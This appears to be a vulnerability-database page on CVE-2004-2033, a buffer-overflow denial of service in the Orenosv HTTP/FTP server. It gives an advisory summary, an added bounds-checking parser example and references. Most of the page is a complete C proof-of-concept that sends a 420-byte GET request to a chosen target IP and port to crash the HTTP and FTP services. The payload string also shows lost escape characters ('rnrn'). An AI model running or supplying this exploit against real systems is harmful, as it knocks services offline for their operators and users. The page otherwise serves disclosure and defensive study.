Orenosv HTTP/FTP Server HTTP GET Remote Denial of Service Vulnerability

Vulnerability ID 1107968 Vulnerability type Boundary condition error
Published 2004-05-25 Updated 2005-10-20
CVE ID CVE-2004-2033
CNNVD-ID CNNVD-200405-062
Platform Windows CVSS score 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/24145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-062
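|Vulnerability Details
Orenosv is a server program that integrates HTTP, FTP and FTPS. It does not adequately check buffer boundaries when handling an overly long HTTP GET request, so a remote attacker can use this vulnerability to mount a buffer overflow attack against the service. Submitting an HTTP GET request containing 420 bytes to Orenosv can cause the HTTP and FTP services to stop responding. Carefully crafted input may allow arbitrary instructions to be executed on the system with the privileges of the process.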
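The missing bounds check described above, shown as a request-line parser that measures the URI before copying it. This is an added example, not Orenosv's code or the PoC author's; `parse_request_line`, `URI_CAP` and its 256-byte value are assumptions, and the request built in `main` is constructed sample input.

```c
#include <stdio.h>
#include <string.h>

#define URI_CAP 256  /* assumed buffer size; the page does not give the server's real one */

/* Parse "GET <uri> HTTP/x.y\r\n" from req[0..len). The URI is copied into
 * uri_out (capacity uri_cap, NUL-terminated) only if it fits.
 * Returns an HTTP status: 200 parsed, 400 malformed, 414 URI too long. */
int parse_request_line(const char *req, size_t len, char *uri_out, size_t uri_cap)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof(method) - 1;
    const char *eol, *uri, *sp;
    size_t uri_len;

    if (uri_cap == 0 || len < mlen || memcmp(req, method, mlen) != 0)
        return 400;
    /* Search only inside the received bytes; never rely on a terminating NUL. */
    eol = memchr(req, '\n', len);
    if (eol == NULL)
        return 400;                      /* no complete request line */
    uri = req + mlen;
    sp = memchr(uri, ' ', (size_t)(eol - uri));
    if (sp == NULL || sp == uri || uri[0] != '/')
        return 400;                      /* no URI or no " HTTP/x.y" part */
    uri_len = (size_t)(sp - uri);
    /* The check the advisory says was missing: compare length before copying. */
    if (uri_len >= uri_cap)
        return 414;
    memcpy(uri_out, uri, uri_len);
    uri_out[uri_len] = '\0';
    return 200;
}

int main(void)
{
    /* Constructed input: a GET line whose path holds 420 filler bytes. */
    char req[512] = "GET /", uri[URI_CAP];
    memset(req + 5, 'A', 420);
    memcpy(req + 425, " HTTP/1.0\r\n\r\n", 13);
    printf("status for 420-byte path: %d\n",
           parse_request_line(req, 438, uri, sizeof uri));
    return 0;
}
```

Rejecting with 414 before the copy keeps both the buffer and the service intact, and the status code gives operators a log signal for over-long request lines.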
|Exploit
source: http://www.securityfocus.com/bid/10420/info

Orenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding. 

/****************************
   PoC to crash the server
 ****************************/

/* Orenosv HTTP/FTP Server Denial Of Service

   Version:
   orenosv059f

   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <[email protected]>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit, atoi */
#include <string.h>   /* memcpy */

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0rnrn";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in      sock;
        char *target;
        int port,bufsize;
        SOCKET mysocket;

        if (argc < 2)
        {
                printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n");
                printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
                printf("www.security-protocols.com\r\n\r\n");
                exit(1);
        }

        wVersionRequested = MAKEWORD(1, 1);
        /* WSAStartup returns 0 on success and a positive error code on failure */
        if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

        target = argv[1];
        port = 9999;

        if (argc >= 3) port = atoi(argv[2]);
        bufsize = 1024;
        if (argc >= 4) bufsize = atoi(argv[3]);

        mysocket = socket(AF_INET, SOCK_STREAM, 0);
        if(mysocket==INVALID_SOCKET)
        {
                printf("Socket error!\r\n");
                exit(1);
        }

        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(target)) == NULL)
        {
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
        {
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Payload...\n");
        if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
        {
                printf("Error Sending the Exploit Payload\r\n");
                closesocket(mysocket);
                exit(1);
        }

        printf("Payload has been sent! Check if the webserver is dead.\r\n");
        closesocket(mysocket);
        WSACleanup();
        return 0;
}
|References

Source: XF
Name: orenosv-http-get-dos(16250)
Link: http://xforce.iss.net/xforce/xfdb/16250
Source: BID
Name: 10420
Link: http://www.securityfocus.com/bid/10420
Source: OSVDB
Name: 6419
Link: http://www.osvdb.org/6419
Source: SECUNIA
Name: 11706
Link: http://secunia.com/advisories/11706
Source: BUGTRAQ
Name: 20040526 Orenosv HTTP/FTP Server Denial Of Service
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108559623703422&w=2
Source: hp.vector.co.jp
Link: http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html
